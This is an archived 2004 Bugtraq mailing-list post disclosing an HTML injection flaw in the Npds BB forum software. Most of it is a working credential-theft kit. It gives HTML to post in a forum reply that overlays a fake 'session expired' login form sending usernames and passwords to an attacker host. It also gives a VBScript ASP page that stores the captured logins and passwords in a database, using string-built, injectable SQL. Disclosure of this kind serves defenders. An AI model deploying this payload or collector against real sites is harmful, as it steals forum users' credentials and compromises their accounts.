lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 7 Jul 2004 06:59:40 -0000
From: Benjamin Tolman <rituel@...la.fr>
To: bugtraq@...urityfocus.com
Subject: Npds BB HTML Injection




I release it very quickly ... So it can be improved :

Code to put in a reply or in a topic :

Your fake message</td></tr><tr><td valign="bottom"><hr noshade size="1" class="ONGL">&nbsp;&nbsp<a href="user.php?op=userinfo&uname=User" CLASS="NOIR" target=_blank><img src="images/forum/icons/profile.gif" border=0 ALT="">Profil</a>&nbsp;&nbsp;<a href="http://www.userland.com" TARGET="_blank" CLASS="NOIR" TARGET="_blank"><IMG SRC="images/forum/icons/www_icon.gif" BORDER=0 Alt="">www</a>&nbsp;&nbsp;<a href="reply.php?topic=1&forum=1&post=2&citation=1" CLASS="NOIR"><IMG SRC="images/forum/icons/quote.gif" BORDER="0" Alt=""><FONT SIZE=1>Citation</FONT></a>

&nbsp;&nbsp;<a href="prntopic.php?forum=1&topic=1&post_id=2" CLASS="NOIR"><IMG SRC="images/forum/icons/print.gif" BORDER="0" Alt=""></a>
</td></tr></table></TD></TR>



<div style="position: absolute; left=0; top=0; height=3200; width=150"><form action="http://mon-site-de-roxor.com/roxor.asp" method="post" name="piquage" target="_self"><table width="100%" border="0" cellspacing="0" cellpadding="0"><tr><td colspan="2"><div align="center">Your session has expired. Please log in to reply.</div></td></tr><tr><td>&nbsp;</td></tr><tr><td><div align="right">Login :</div> </td> <td><input name="login" type="text" value=""> </td></tr><tr><td><div align="right">Mot de passe :</div> </td><td><input name="password" type="password" value=""> </td></tr><tr><td>&nbsp;</td></tr><tr><td colspan="2"><div align="center"><input type="submit" name="Submit" value="Envoyer"></div></td></tr></table></form></div>

Example of Code (VBscript) to put in the page called by the form in the topic : 

<%@ Language=VBScript %>



<%



set base=server.createobject("ADODB.CONNECTION")

base.open nom_base, login_base, password_base



referant=left(request.servervariables("HTTP_REFERER"),instr(8,request.servervariables("HTTP_REFERER"),"/")-1)

login=Request.QueryString("login")

password=Request.QueryString("password")



requete_vol_infos="INSERT statistiques (date,npds,login,password) VALUES (getdate(),'" + cstr(referant) + "','" + cstr(login) + "','" + cstr(password) + "')"



set resultat_vol_infos=server.CreateObject("ADODB.RECORDSET")

resultat_vol_infos.Open requete_vol_infos, base



response.redirect(referant)



%>

Thanks to N-0-X and NewFFR :o)

Rituel

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ